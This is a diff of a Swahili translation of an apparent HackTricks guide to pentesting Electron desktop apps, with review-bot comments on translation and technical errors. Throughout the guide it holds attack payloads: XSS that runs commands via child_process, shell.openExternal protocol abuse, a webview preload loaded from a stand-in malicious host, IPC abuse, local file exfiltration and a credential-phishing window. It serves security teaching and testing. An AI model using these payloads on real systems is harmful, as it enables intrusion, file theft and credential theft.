Now that a comprehensive enumeration of the web application has been performed it's time to check for a lot of possible vulnerabilities. You can find the checklist here:
Sasa baada ya kufanyika upimaji mpana wa programu ya wavuti, ni wakati wa kuangalia udhaifu mwingi unaowezekana. Unaweza kupata checklist hapa:
{{#ref}}
../../pentesting-web/web-vulnerabilities-methodology.md
{{#endref}}
Find more info about web vulns in:
Pata taarifa zaidi kuhusu web vulns katika:
- [https://six2dez.gitbook.io/pentest-book/others/web-checklist](https://six2dez.gitbook.io/pentest-book/others/web-checklist)
- [https://kennel209.gitbooks.io/owasp-testing-guide-v4/content/en/web_application_security_testing/configuration_and_deployment_management_testing.html](https://kennel209.gitbooks.io/owasp-testing-guide-v4/content/en/web_application_security_testing/configuration_and_deployment_management_testing.html)
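Review bot: the NTLM header value in both the old and new line, `“Authorization: NTLM TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA=”`, wraps the header in typographic quotes inside the code span, so anyone copying it sends literal `“` and `”` characters; drop the quotes. In the translated sentence, `Ikiwa server inayotumia inauliza authentication ni Windows` garbles the relative clause; `Ikiwa server inayoomba authentication ni Windows` matches the English. `kuweka mchakato wa automati` can simply be `kufanya hili kiotomatiki`.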
@ -342,7 +342,7 @@ Find more info about web vulns in:
### Monitor Pages for changes
You can use tools such as [https://github.com/dgtlmoon/changedetection.io](https://github.com/dgtlmoon/changedetection.io) to monitor pages for modifications that might insert vulnerabilities.
Unaweza kutumia zana kama [https://github.com/dgtlmoon/changedetection.io](https://github.com/dgtlmoon/changedetection.io) kufuatilia kurasa kwa mabadiliko ambayo yanaweza kuingiza udhaifu.
### HackTricks Automatic Commands
```

View File

@ -4,27 +4,27 @@
## Utangulizi
Electron huunganisha backend ya ndani (ikiwa na **NodeJS**) na frontend (**Chromium**), ingawa ina upungufu wa baadhi ya mifumo ya usalama ya vivinjari vya kisasa.
Electron huunganisha backend ya ndani (na **NodeJS**) na frontend (**Chromium**), ingawa haijumuishi baadhi ya mifumo ya usalama ya vichunguzi vya kisasa.
Mara nyingi unaweza kupata msimbo wa app ya electron ndani ya programu ya `.asar`; ili kupata msimbo unahitaji kuutoa:
Mara nyingi utapata msimbo wa programu ya Electron ndani ya faili la `.asar`; ili kupata msimbo, unahitaji kuliondoa:
```bash
npx asar extract app.asar destfolder #Extract everything
npx asar extract-file app.asar main.js #Extract just a file
```
Katika msimbo wa chanzo wa app ya Electron, ndani ya `packet.json`, unaweza kupata faili `main.js` iliyobainishwa ambapo mipangilio ya usalama imewekwa.
Katika msimbo wa chanzo wa app ya Electron, ndani ya `packet.json`, unaweza kupata faili `main.js` iliyobainishwa ambapo security configs zimewekwa.
```json
{
"name": "standard-notes",
"main": "./app/index.js",
```
Electron ina aina mbili za mchakato:
Electron ina aina mbili za michakato:
- Main Process (ina ufikiaji kamili wa NodeJS)
- Renderer Process (inapaswa kuwa na ufikiaji mdogo wa NodeJS kwa sababu za usalama)
- Mchakato Mkuu (ina ufikiaji kamili wa NodeJS)
- Mchakato wa Renderer (unapaswa kuwa na ufikiaji uliopunguzwa wa NodeJS kwa sababu za usalama)
![](<../../../images/image (182).png>)
Mchakato wa **renderer process** utakuwa dirisha la kivinjari linalopakia faili:
Mchakato wa **renderer** utakuwa dirisha la kivinjari linalopakia faili:
```javascript
const { BrowserWindow } = require("electron")
let win = new BrowserWindow()
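Review bot: `packet.json` in both the old and new sentence should be `package.json`; that is the Electron app manifest whose `main` field the JSON snippet below shows. The new line also replaces `vivinjari` (browsers) with `vichunguzi`, which means inspectors, so the old word should be kept, and `kuliondoa` (remove it) loses the sense of "extract" that `npx asar extract` carries; `kulitoa` keeps it.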
@ -32,20 +32,20 @@ let win = new BrowserWindow()
//Open Renderer Process
win.loadURL(`file://path/to/index.html`)
```
Mipangilio ya **renderer process** yanaweza **kusanidiwa** katika **main process** ndani ya faili main.js. Baadhi ya mipangilio yatazuia programu ya Electron kupata **RCE** au udhaifu mwingine ikiwa **mipangilio imewekwa ipasavyo**.
Mipangilio ya **mchakato wa renderer** yanaweza **kuwekwa** katika **mchakato mkuu** ndani ya faili main.js. Baadhi ya mipangilio hiyo itaweza **kuzuia Electron application kupata RCE** au udhaifu mwingine ikiwa **mipangilio imewekwa ipasavyo**.
Programu ya Electron inaweza **kufikia kifaa** kupitia Node apis ingawa inaweza kusanidiwa kuizuia:
The electron application **inaweza kufikia kifaa** kupitia Node apis ingawa inaweza kuwekewa mipangilio ili kuzuia hilo:
- **`nodeIntegration`** - kwa chaguo-msingi ni `off`. Ikiwa `on`, inaruhusu kufikia vipengele vya Node kutoka kwenye **renderer process**.
- **`contextIsolation`** - kwa chaguo-msingi ni `on`. Ikiwa `off`, **main** na **renderer processes** hazitenganishwi.
- **`preload`** - tupu kwa chaguo-msingi.
- [**`sandbox`**](https://docs.w3cub.com/electron/api/sandbox-option) - kwa chaguo-msingi ni `off`. Itazuia vitendo ambavyo NodeJS inaweza kufanya.
- **`nodeIntegration`** - is `off` by default. If on, allows to access node features from the renderer process.
- **`contextIsolation`** - is `on` by default. If off, main and renderer processes aren't isolated.
- **`preload`** - empty by default.
- [**`sandbox`**](https://docs.w3cub.com/electron/api/sandbox-option) - is off by default. It will restrict the actions NodeJS can perform.
- Node Integration in Workers
- **`nodeIntegrationInSubframes`** - kwa chaguo-msingi ni `off`.
- Ikiwa **`nodeIntegration`** imewezeshwa, hii itaruhusu matumizi ya **Node.js APIs** katika kurasa za wavuti zinazopakiwa ndani ya **iframes** ndani ya programu ya Electron.
- Ikiwa **`nodeIntegration`** imezimwa, basi preloads zitaanzishwa ndani ya iframe
- **`nodeIntegrationInSubframes`**- is `off` by default.
- If **`nodeIntegration`** is **enabled**, this would allow the use of **Node.js APIs** in web pages that are **loaded in iframes** within an Electron application.
- If **`nodeIntegration`** is **disabled**, then preloads will load in the iframe
Mfano wa usanidi:
Example of configuration:
```javascript
const mainWindowOptions = {
title: "Discord",
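Review bot: the renderer-options list appears twice in this hunk, once translated (`**`nodeIntegration`** - kwa chaguo-msingi ni `off`...`) and once in untranslated English (`**`nodeIntegration`** - is `off` by default...`), and `Mfano wa usanidi:` is likewise followed by `Example of configuration:`; on a translation commit the English copy should not be the incoming side, so check that the regenerated file did not revert these lines. `The electron application **inaweza kufikia kifaa**` keeps the English subject; `Programu ya Electron inaweza kufikia kifaa` is the Swahili form. Two points carried over from the source text are worth correcting while here: `contextIsolation` does not isolate the main process from the renderer, it isolates the preload script's JavaScript context from the web page's context inside the renderer (as the later contextIsolation section of this file itself explains), and `sandbox` has been enabled by default for renderers since Electron 20, so "kwa chaguo-msingi ni `off`" only holds for older Electron versions.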
@ -97,14 +97,13 @@ onerror="alert(require('child_process').execSync('uname -a').toString());" />
```
### Kukamata trafiki
Badilisha usanidi wa start-main na ongeza matumizi ya proxy kama:
Badilisha usanidi wa start-main na uongeze matumizi ya proxy kama:
```javascript
"start-main": "electron ./dist/main/main.js --proxy-server=127.0.0.1:8080 --ignore-certificateerrors",
```
## Electron Local Code Injection
Ikiwa unaweza kuendesha Electron App ndani ya mashine yako, inawezekana kwamba unaweza kuifanya itekeleze arbitrary javascript code. Angalia jinsi katika:
Ikiwa unaweza kuendesha App ya Electron kwa ndani, kuna uwezekano unaweza kuifanya iendeshe msimbo wowote wa javascript. Angalia jinsi katika:
{{#ref}}
../../../macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-electron-applications-injection.md
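Review bot: the proxy flag in the `start-main` line is misspelled: Chromium and Electron accept `--ignore-certificate-errors`, not `--ignore-certificateerrors`, so as written the intercepting proxy's certificate is still rejected. Suggested line: `"start-main": "electron ./dist/main/main.js --proxy-server=127.0.0.1:8080 --ignore-certificate-errors",`.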
@ -112,7 +111,7 @@ Ikiwa unaweza kuendesha Electron App ndani ya mashine yako, inawezekana kwamba u
## RCE: XSS + nodeIntegration
Ikiwa **nodeIntegration** imewekwa kuwa **on**, JavaScript ya ukurasa wa wavuti inaweza kutumia vipengele vya Node.js kwa urahisi kwa kupiga tu `require()`. Kwa mfano, njia ya kuendesha application ya calc kwenye Windows ni:
Ikiwa **nodeIntegration** imewekwa kuwa **on**, javascript ya ukurasa wa wavuti inaweza kutumia vipengele za Node.js kwa urahisi kwa kuitisha `require()`. Kwa mfano, njia ya kuendesha programu calc kwenye Windows ni:
```html
<script>
require("child_process").exec("calc")
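Review bot: noun-class agreement in the new sentence: `vipengele za Node.js` should be `vipengele vya Node.js`, as the line it replaces has; and `kuitisha require()` (to summon) reads oddly for "calling", `kuita require()` is the usual rendering.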
@ -124,7 +123,7 @@ top.require("child_process").exec("open /System/Applications/Calculator.app")
## RCE: preload
Script iliyotajwa katika mpangilio huu ni **imepakuliwa kabla ya scripts nyingine katika renderer**, hivyo ina **ufikiaji usio na kikomo kwa Node APIs**:
Skripti iliyotajwa katika mipangilio hii in**apakiwa kabla ya skripti zingine katika renderer**, hivyo ina **ufikiaji usio na mipaka kwa Node APIs**:
```javascript
new BrowserWindow{
webPreferences: {
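Review bot: the preload snippet is not valid JavaScript: `new BrowserWindow{` is missing the call parenthesis and should be `new BrowserWindow({`, which is what the `});` closing in the following context expects. The following hunk header also shows the preload path as `'perload.js'`; unless that is the real filename in the app being described, it should be `'preload.js'`.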
@ -133,7 +132,7 @@ preload: _path2.default.join(__dirname, 'perload.js'),
}
});
```
Kwa hivyo, script inaweza ku-export node-features kwa pages:
Hivyo, script inaweza kusafirisha node-features hadi pages:
```javascript:preload.js
typeof require === "function"
window.runCalc = function () {
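Review bot: `kusafirisha node-features hadi pages` renders "export" as "ship" and "to" as "until"; `kufichua node features kwa pages` (expose Node features to pages) keeps the meaning. In the `preload.js` snippet the bare expression `typeof require === "function"` has no effect on its own and reads as a leftover check; either drop it or turn it into a comment explaining that `require` is available in the preload context.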
@ -149,20 +148,20 @@ runCalc()
</script>
</body>
```
> [!NOTE] > **Ikiwa `contextIsolation` imewezeshwa, hii haitafanya kazi**
> [!NOTE] > **Ikiwa `contextIsolation` imewashwa, hii haitafanya kazi**
## RCE: XSS + contextIsolation
_**contextIsolation**_ huanzisha **muktadha tofauti kati ya scripts za ukurasa wa wavuti na code ya ndani ya Electron** ili utekelezaji wa JavaScript wa kila code usiathiriane. Hii ni sifa muhimu kuondoa uwezekano wa RCE.
The _**contextIsolation**_ inatoa **muktadha uliogawanywa kati ya script za ukurasa wa wavuti na code ya ndani ya JavaScript ya Electron** ili utekelezaji wa JavaScript wa kila code usiathiriane. Hii ni sifa muhimu kuondoa uwezekano wa RCE.
Kama muktadha haukutengwa, mshambuliaji anaweza:
Ikiwa muktadha haujatengwa, mshambuliaji anaweza:
1. Endesha **JavaScript yoyote katika renderer** (XSS au kuvinjari kwenda tovuti za nje)
2. **Kuandika upya built-in method** ambayo inatumiwa katika preload au Electron internal code ili kudhibiti function
3. **Kusababisha** matumizi ya **function iliyooandikwa upya**
1. Kutekeleza **arbitrary JavaScript in renderer** (XSS au navigation to external sites)
2. **Kuandika upya built-in method** inayotumiwa katika preload au code ya ndani ya Electron ili kumiliki function
3. **Chochea** matumizi ya **overwritten function**
4. RCE?
Kuna sehemu 2 ambapo built-int methods zinaweza kuandikwa upya: Katika preload code au katika Electron internal code:
Kuna sehemu 2 ambapo built-in methods zinaweza kuandikwa upya: Katika code ya preload au katika code ya ndani ya Electron:
{{#ref}}
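Review bot: the callout `> [!NOTE] > **Ikiwa `contextIsolation` imewashwa, hii haitafanya kazi**` puts the body on the same line as the marker after a second `>`, which renders as literal text in both versions; split it into `> [!NOTE]` with the bold sentence on the next `>` line. Several new lines also keep English fragments where the old lines were Swahili: `The _**contextIsolation**_ inatoa` (drop `The`), `Kutekeleza **arbitrary JavaScript in renderer** (XSS au navigation to external sites)` and `**Chochea** matumizi ya **overwritten function**`.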
@ -179,9 +178,9 @@ electron-contextisolation-rce-via-electron-internal-code.md
electron-contextisolation-rce-via-ipc.md
{{#endref}}
### Bypass click event
### Kuepuka vikwazo vya tukio la klik
Kama kuna vizuizi vinavyotumika unapobofya link unaweza kuvipita kwa **kubofya kwa kitufe cha katikati (middle click)** badala ya bofya la kushoto la kawaida
Ikiwa vikwazo vinapotumika unapobofya kiungo, huenda ukaweza kuviweka kando kwa **kufanya middle click** badala ya bonyeza la kushoto la kawaida.
```javascript
window.addEventListener('click', (e) => {
```
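Review bot: the code block is truncated to its opening line `window.addEventListener('click', (e) => {` with no body or closing, so the reader cannot see which restriction the handler applies or why a middle click gets past it; either complete the snippet or state the point in prose, namely that the `click` event does not fire for the middle button (that dispatches `auxclick`), so a defence that only intercepts `click` should also handle `auxclick` or, better, enforce the policy in `will-navigate`/`setWindowOpenHandler`. `tukio la klik` can use `kubofya`, as the sentence below already does.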
@ -189,24 +188,24 @@ window.addEventListener('click', (e) => {
Kwa taarifa zaidi kuhusu mifano hii angalia [https://shabarkin.medium.com/1-click-rce-in-electron-applications-79b52e1fe8b8](https://shabarkin.medium.com/1-click-rce-in-electron-applications-79b52e1fe8b8) na [https://benjamin-altpeter.de/shell-openexternal-dangers/](https://benjamin-altpeter.de/shell-openexternal-dangers/)
Wakati wa kupeleka programu ya desktop ya Electron, kuhakikisha mipangilio sahihi ya `nodeIntegration` na `contextIsolation` ni muhimu. Imebainishwa kwamba **client-side remote code execution (RCE)** inayolenga preload scripts au native code ya Electron kutoka main process inadhibitiwa kwa ufanisi ikiwa mipangilio hii imewekwa.
Wakati wa kupeleka programu ya desktop ya Electron, kuhakikisha mipangilio sahihi ya `nodeIntegration` na `contextIsolation` ni muhimu. Imebainika kwamba **client-side remote code execution (RCE)** inayolenga preload scripts au Electron's native code kutoka kwa main process inazuiziwa kwa ufanisi pale mipangilio haya yanapowekwa.
Wakati mtumiaji anapotumia viungo au kufungua madirisha mapya, wasikilizaji maalum wa matukio huanzishwa, ambayo ni muhimu kwa usalama na utendakazi wa programu:
Wakati mtumiaji anabofya linki au kufungua windows mpya, wasikilizaji maalum wa matukio huchomwa, ambayo ni muhimu kwa usalama na utendakazi wa programu:
```javascript
webContents.on("new-window", function (event, url, disposition, options) {}
webContents.on("will-navigate", function (event, url) {}
```
Wasikilizaji hawa **wanabadilishwa na programu ya desktop** ili kutekeleza **mantiki ya biashara** yake. Programu huchunguza kama kiungo kilichofunguliwa kinapaswa kufunguliwa ndani ya programu au katika kivinjari cha wavuti cha nje. Uamuzi huu kawaida hufanywa kupitia function, `openInternally`. Ikiwa function hii inarudisha `false`, inaonyesha kwamba kiungo kinapaswa kufunguliwa nje, kwa kutumia function `shell.openExternal`.
Wasikilizaji hawa huandikishwa upya na programu ya desktop ili kutekeleza mantiki yake ya biashara. Programu hupima ikiwa kiungo kilichopitiwa kinapaswa kufunguliwa ndani ya programu au katika kivinjari cha mtandao cha nje. Uamuzi huu kawaida hufanywa kupitia function, `openInternally`. Ikiwa function hii inarejesha `false`, inamaanisha kwamba kiungo kinapaswa kufunguliwa kwa nje, kwa kutumia function ya `shell.openExternal`.
**Hapa kuna pseudocode iliyorahishwa:**
**Here is a simplified pseudocode:**
![https://miro.medium.com/max/1400/1*iqX26DMEr9RF7nMC1ANMAA.png](<../../../images/image (261).png>)
![https://miro.medium.com/max/1400/1*ZfgVwT3X1V_UfjcKaAccag.png](<../../../images/image (963).png>)
Electron JS security best practices yanapendekeza kutoikubali content isiyo ya kuaminika kwa kutumia `openExternal`, kwani inaweza kusababisha RCE kupitia protocols mbalimbali. Systems za uendeshaji zinaunga mkono protocols tofauti ambazo zinaweza kusababisha RCE. Kwa mifano ya kina na maelezo zaidi juu ya mada hii, unaweza kurejea [rasilimali hii](https://positive.security/blog/url-open-rce#windows-10-19042), ambayo inajumuisha Windows protocol examples zinazoweza kutumiwa ku-exploit ugumu huu.
Electron JS security best practices zinashauri kutoikubali content isiyotegemewa kwa kutumia function ya `openExternal`, kwani inaweza kusababisha RCE kupitia protokoli mbalimbali. Mifumo ya uendeshaji inaunga mkono protokoli tofauti ambazo zinaweza kusababisha RCE. Kwa mifano ya kina na maelezo zaidi juu ya mada hii, tazama [this resource](https://positive.security/blog/url-open-rce#windows-10-19042), ambayo inajumuisha mifano ya protokoli za Windows zinazoweza kutumia udhaifu huu.
Katika macos, function ya `openExternal` inaweza kutumika vibaya kutekeleza amri yoyote kama katika `shell.openExternal('file:///System/Applications/Calculator.app')`.
In macos, the `openExternal` function inaweza kutumiwa kutekeleza amri za kiholela kama katika `shell.openExternal('file:///System/Applications/Calculator.app')`.
**Mifano ya Windows protocol exploits ni pamoja na:**
```html
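Review bot: `webContents.on("new-window", ...)` was deprecated in Electron 12 and removed in Electron 22 in favour of `webContents.setWindowOpenHandler`, so the listener shown and the `openInternally` flow built on it only apply to apps pinned to older Electron; a sentence saying so would help. Translation leftovers in the new lines: `tazama [this resource]`, and `In macos, the `openExternal` function inaweza kutumiwa` mixes the English subject into a Swahili sentence (the old line `Katika macos, function ya `openExternal` inaweza kutumika vibaya` was correct); both `**Hapa kuna pseudocode iliyorahishwa:**` and `**Here is a simplified pseudocode:**` appear, and only the Swahili one should survive.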
@ -228,17 +227,17 @@ window.open(
)
</script>
```
## RCE: webviewTag + preload IPC dhaifu + shell.openExternal
## RCE: webviewTag + dhaifu preload IPC + shell.openExternal
Udhaifu huu unaweza kupatikana katika **[this report](https://flatt.tech/research/posts/escaping-electron-isolation-with-obsolete-feature/)**.
The **webviewTag** ni **sifa iliyokataliwa** inayoruhusu matumizi ya **NodeJS** katika **renderer process**, ambayo inapaswa kuzimwa kwa kuwa inaruhusu kupakia script ndani ya **preload context** kama:
The **webviewTag** ni **sifa iliyopitwa na wakati** inayoruhusu matumizi ya **NodeJS** katika **renderer process**, ambayo inapaswa kuzimwa kwani inaruhusu kupakia script ndani ya **preload context** kama:
```xml
<webview src="https://example.com/" preload="file://malicious.example/test.js"></webview>
```
Kwa hivyo, mshambuliaji anayefanikiwa kupakia ukurasa wowote anaweza kutumia tag hiyo ili **kupakia preload script yoyote**.
Kwa hivyo, mdukuzi ambaye anafanikiwa kupakia ukurasa wowote anaweza kutumia tag hiyo ili **load an arbitrary preload script**.
Preload script hii ilitumiwa vibaya kisha kuitisha **vulnerable IPC service (`skype-new-window`)** ambayo ilikuwa ikiita **`shell.openExternal`** ili kupata RCE:
Script hii ya preload ilitumiwa vibaya kisha kuitumia kuita **vulnerable IPC service (`skype-new-window`)** ambayo ilikuwa ikipiga **`shell.openExternal`** ili kupata RCE:
```javascript
(async() => {
const { ipcRenderer } = require("electron");
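Review bot: word order in the new heading `## RCE: webviewTag + dhaifu preload IPC + shell.openExternal` is wrong for Swahili, where the adjective follows the noun; the old heading `webviewTag + preload IPC dhaifu + shell.openExternal` was correct. `anaweza kutumia tag hiyo ili **load an arbitrary preload script**` is untranslated where the old line had `kupakia preload script yoyote`. On the technical side, `<webview>` is only available when `webviewTag: true` is set in `webPreferences` (it is off by default), which the sentence on disabling the feature could state explicitly.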
@ -249,13 +248,13 @@ await ipcRenderer.invoke("skype-new-window", `file:///C:/Users/${username[1]}/Do
}, 5000);
})();
```
## Kusoma Faili za Ndani: XSS + contextIsolation
## Kusoma Mafaili ya Ndani: XSS + contextIsolation
**Kuzima `contextIsolation` kunaruhusu matumizi ya `<webview>` tags**, sawa na `<iframe>`, kwa kusoma na exfiltrating faili za ndani. Mfano ulioonyeshwa unaonyesha jinsi ya kutumia udhaifu huu kusoma yaliyomo ya faili za ndani:
**Kuzima `contextIsolation` kunaruhusu matumizi ya tags `<webview>`**, sawa na `<iframe>`, kwa kusoma na exfiltrating mafaili ya ndani. Mifano iliyotolewa inaonyesha jinsi ya exploit udhaifu huu ili kusoma yaliyomo ya mafaili ya ndani:
![](<../../../images/1 u1jdRYuWAEVwJmf_F2ttJg (1).png>)
Zaidi ya hayo, njia nyingine ya **kusoma faili ya ndani** imewasilishwa, ikionyesha udhaifu muhimu wa kusoma faili za ndani katika Electron desktop app. Hii inahusisha kuingiza script ili kuitumia application na exfiltrate data:
Aidha, njia nyingine ya **kusoma faili ya ndani** imeshirikiwa, ikionyesha udhaifu muhimu wa local file read katika Electron desktop app. Hii inahusisha kuingiza script ili exploit application na exfiltrate data:
```html
<br /><br /><br /><br />
<h1>
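Review bot: untranslated verbs in the new lines: `jinsi ya exploit udhaifu huu` and `ili exploit application na exfiltrate data`, where the old lines had `kutumia udhaifu huu` and `kuitumia application`. The heading now says `Mafaili ya Ndani` while the body lines still say `faili za ndani` / `faili ya ndani`; pick one noun class for "files" throughout the file.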
@ -271,45 +270,45 @@ frames[0].document.body.innerText
</script>
</h1>
```
## **RCE: XSS + Old Chromium**
## **RCE: XSS + Chromium ya zamani**
Ikiwa **chromium** inayotumiwa na programu ni **zamani** na kuna **vulnerabilities** zilizojulikana ndani yake, inaweza kuwa inawezekana kuitumia na kupata RCE kupitia XSS.\
Ikiwa **chromium** inayotumika na application ni **ya zamani** na kuna **known vulnerabilities** juu yake, inaweza kuwa inawezekana **kuitumia na kupata RCE kupitia XSS**.\
Unaweza kuona mfano katika **writeup** hii: [https://blog.electrovolt.io/posts/discord-rce/](https://blog.electrovolt.io/posts/discord-rce/)
## **XSS Phishing via Internal URL regex bypass**
## **XSS Phishing kupitia Internal URL regex bypass**
Iwapo umetambua XSS lakini **huwezi kusababisha RCE au kuiba faili za ndani**, unaweza kujaribu kuitumia kuiba **credentials kupitia phishing**.
Kama umepata XSS lakini **huwezi kusababisha RCE au kuiba faili za ndani** unaweza kujaribu kuitumia kuiba **credentials kupitia phishing**.
Kwanza kabisa unahitaji kujua kinachotokea unapojaribu kufungua URL mpya, ukiangalia code ya JS katika front-end:
Kwanza kabisa unahitaji kujua kinachotokea unapo jaribu kufungua URL mpya, ukichunguza JS code kwenye front-end:
```javascript
webContents.on("new-window", function (event, url, disposition, options) {} // opens the custom openInternally function (it is declared below)
webContents.on("will-navigate", function (event, url) {} // opens the custom openInternally function (it is declared below)
```
Wito wa **`openInternally`** utaamua ikiwa **link** itafunguliwa katika **desktop window** kama ni link inayomilikiwa na platform, **au** itafunguliwa katika **browser kama 3rd party resource**.
Mwito wa **`openInternally`** utaamua kama **link** itafunguliwa katika **desktop window** kwa kuwa ni link inayomilikiwa na jukwaa, **or** itafunguliwa katika **browser as a 3rd party resource**.
Katika kesi ambapo **regex** inayotumiwa na function ni **nyeti kwa bypasses** (kwa mfano kwa **kutokutoa escape kwa dots za subdomains**) mshambuliaji anaweza kutumia XSS kufungua **dirisha jipya ambalo** litakuwa kwenye miundombinu ya mshambuliaji **litaomba vigezo vya kuingia** kwa mtumiaji:
Katika kesi **regex** inayotumiwa na function iko **vulnerable to bypasses** (kwa mfano kwa **not escaping the dots of subdomains**), mshambuliaji anaweza kutumia XSS ili **open a new window which** itakayopangwa katika miundombinu ya mshambuliaji na kuwa **asking for credentials** kwa mtumiaji:
```html
<script>
window.open("<http://subdomainagoogleq.com/index.html>")
</script>
```
## `file://` Protokoli
## `file://` Protocol
Kama ilivyotajwa katika [the docs](https://www.electronjs.org/docs/latest/tutorial/security#18-avoid-usage-of-the-file-protocol-and-prefer-usage-of-custom-protocols) kurasa zinazoendeshwa kwa **`file://`** zina ufikiaji wa upande mmoja kwa kila faili kwenye mashine yako, ikimaanisha kwamba **masuala ya XSS yanaweza kutumika kupakia faili za aina yoyote** kutoka kwenye mashine ya mtumiaji. Kutumia **protokoli maalum** kunazuia matatizo kama haya kwa sababu unaweza kupunguza protokoli ili kutoa tu seti maalum ya faili.
As mentioned in [the docs](https://www.electronjs.org/docs/latest/tutorial/security#18-avoid-usage-of-the-file-protocol-and-prefer-usage-of-custom-protocols) pages running on **`file://`** zina ufikiaji wa pande moja kwa kila faili kwenye mashine yako, ikimaanisha kwamba **XSS issues can be used to load arbitrary files** kutoka kwa mashine ya mtumiaji. Kutumia **protokoli maalum** kunazuia matatizo kama haya kwa sababu unaweza kuzuia protokoli kutoa tu seti maalum ya faili.
## Moduli ya Remote
## Remote module
Moduli ya Remote ya Electron inaruhusu **mchakato za renderer kufikia API za mchakato mkuu**, ikirahisisha mawasiliano ndani ya programu ya Electron. Hata hivyo, kuamilisha moduli hii kunaweka hatari kubwa za usalama. Inapanua uso wa shambulio la programu, na kuifanya iwe nyeti zaidi kwa udhaifu kama cross-site scripting (XSS) attacks.
The Electron Remote module inaruhusu **renderer processes to access main process APIs**, ikirahisisha mawasiliano ndani ya programu ya Electron. Hata hivyo, kuamilisha module hii kunaleta hatari kubwa za usalama. Inapanua uso wa kushambuliwa wa programu, na kuifanya iwe nyeti zaidi kwa udhaifu kama vile cross-site scripting (XSS) attacks.
> [!TIP]
> Ingawa moduli ya **remote** inaonyesha baadhi ya API kutoka mchakato mkuu hadi mchakato za renderer, sio rahisi kupata RCE kwa kumeza tu komponenti hizi. Hata hivyo, komponenti zinaweza kufichua taarifa nyeti.
> Ingawa **remote** module inaonyesha baadhi ya APIs kutoka main hadi renderer processes, si moja kwa moja kupata RCE kwa kutumia components pekee. Hata hivyo, components zinaweza kufichua taarifa nyeti.
> [!WARNING]
> Programu nyingi ambazo bado zinatumia moduli ya **remote** hufanya hivyo kwa njia inayohitaji **NodeIntegration iwe imewezeshwa** katika mchakato wa renderer, jambo ambalo ni **hatari kubwa ya usalama**.
> Programu nyingi zinazotumia remote module bado hufanya hivyo kwa njia inayohitaji **NodeIntegration to be enabled** katika renderer process, ambayo ni **huge security risk**.
Tangu Electron 14, moduli ya `remote` ya Electron inaweza kuwa imewezishwa kwa hatua kadhaa; kutokana na sababu za usalama na utendaji, inashauriwa **kutoitumia**.
Tangu Electron 14 `remote` module ya Electron inaweza kuamshwa kwa njia kadhaa; kutokana na sababu za usalama na utendakazi ni **inashauriwa kutotumia**.
Ili kuiwezesha, kwanza inahitajika **kuiwezesha katika mchakato mkuu**:
Ili kuiwezesha, kwanza ilihitajika **enable it in the main process**:
```javascript
const remoteMain = require('@electron/remote/main')
remoteMain.initialize()
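Review bot: the `window.open` example carries literal angle brackets inside the string (`"<http://subdomainagoogleq.com/index.html>"`), which is markdown autolink residue rather than a URL, so the snippet as written opens an invalid address; quote it as `window.open("http://subdomainagoogleq.com/index.html")`. In the added remote-module sentence "kutokana na sababu za usalama na utendakazi ni **inashauriwa kutotumia**" the "ni" is dangling; the removed wording "inashauriwa **kutoitumia**" reads correctly. "ilihitajika" (past tense) in "kwanza ilihitajika **enable it in the main process**" should stay present tense ("inahitajika"), and the English fragment can be "kuiwezesha katika mchakato mkuu" as in the line it replaces.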
@ -320,37 +319,37 @@ mainWindow = new BrowserWindow({
})
remoteMain.enable(mainWindow.webContents)
```
Kisha, mchakato wa renderer unaweza kuingiza vitu kutoka kwenye module kama ifuatavyo:
Kisha, mchakato wa renderer unaweza ku-import objects kutoka kwa module kama ifuatavyo:
```javascript
import { dialog, getCurrentWindow } from '@electron/remote'
```
Mchapisho wa **[blog post](https://blog.doyensec.com/2021/02/16/electron-apis-misuse.html)** unaonyesha baadhi ya **functions** za kuvutia zinazotolewa na object **`app`** kutoka kwa remote module:
**[blog post](https://blog.doyensec.com/2021/02/16/electron-apis-misuse.html)** inaonyesha baadhi ya kazi za kuvutia zilizoonyeshwa na object **`app`** kutoka kwa remote module:
- **`app.relaunch([options])`**
- **Inazindua upya** programu kwa **kuexit** instance ya sasa na **kuanzisha** mpya. Inafaa kwa **app updates** au mabadiliko makubwa ya **state**.
- **Inaanza upya** programu kwa **kuacha** instance ya sasa na **kuzindua** mpya. Inafaa kwa **sasisho za app** au **mabadiliko makubwa ya hali**.
- **`app.setAppLogsPath([path])`**
- **Huweka** au **huunda** saraka kwa ajili ya kuhifadhi **app logs**. Logs zinaweza **kutolewa** au **kubadilishwa** kwa kutumia **`app.getPath()`** au **`app.setPath(pathName, newPath)`**.
- **Hutangaza** au **huunda** saraka kwa kuhifadhi **app logs**. Logi hizo zinaweza **kutolewa** au **kuhaririwa** kwa kutumia **`app.getPath()`** au **`app.setPath(pathName, newPath)`**.
- **`app.setAsDefaultProtocolClient(protocol[, path, args])`**
- **Inasajili** executable ya sasa kama **default handler** kwa **protocol** maalum. Unaweza kutoa **custom path** na **arguments** ikiwa zinahitajika.
- **Inasajili** executable ya sasa kama **default handler** kwa protocol fulani. Unaweza kutoa **custom path** na **arguments** kama inavyohitajika.
- **`app.setUserTasks(tasks)`**
- **Inaongeza** tasks kwenye **Tasks category** katika **Jump List** (Windows). Kila task inaweza kudhibiti jinsi app inavyofunguliwa (**launched**) au ni **arguments** gani zinapitishwa.
- **Inaongeza** tasks kwenye **Tasks category** katika **Jump List** (on Windows). Kila task inaweza kudhibiti jinsi app inavyofunguliwa au ni **arguments** gani zinapitishwa.
- **`app.importCertificate(options, callback)`**
- **Inaingiza** **PKCS#12 certificate** kwenye **certificate store** ya mfumo (Linux tu). **Callback** inaweza kutumika kushughulikia matokeo.
- **Inaingiza** cheti cha **PKCS#12** kwenye **certificate store** ya mfumo (Linux tu). **Callback** inaweza kutumika kushughulikia matokeo.
- **`app.moveToApplicationsFolder([options])`**
- **Inahamisha** programu kwenye **Applications folder** (macOS). Husaidia kuhakikisha **standard installation** kwa watumiaji wa Mac.
- **Inahamisha** programu kwenda **Applications folder** (on macOS). Husaidia kuhakikisha **standard installation** kwa watumiaji wa Mac.
- **`app.setJumpList(categories)`**
- **Inatengeneza** au **inaondoa** **custom Jump List** kwenye **Windows**. Unaweza kuainisha **categories** kupanga jinsi tasks zinavyoonekana kwa mtumiaji.
- **Inaunda** au **inaondoa** **custom Jump List** kwenye **Windows**. Unaweza kubainisha **categories** kupanga jinsi tasks zinavyoonekana kwa mtumiaji.
- **`app.setLoginItemSettings(settings)`**
- **Inabainisha** executable zipi zinaanza wakati wa **login** pamoja na **options** zao (macOS na Windows tu).
- **Inasanidi** ni executable zipi zinaanzishwa wakati wa **login** pamoja na **options** zao (macOS na Windows pekee).
Example:
Mfano:
```javascript
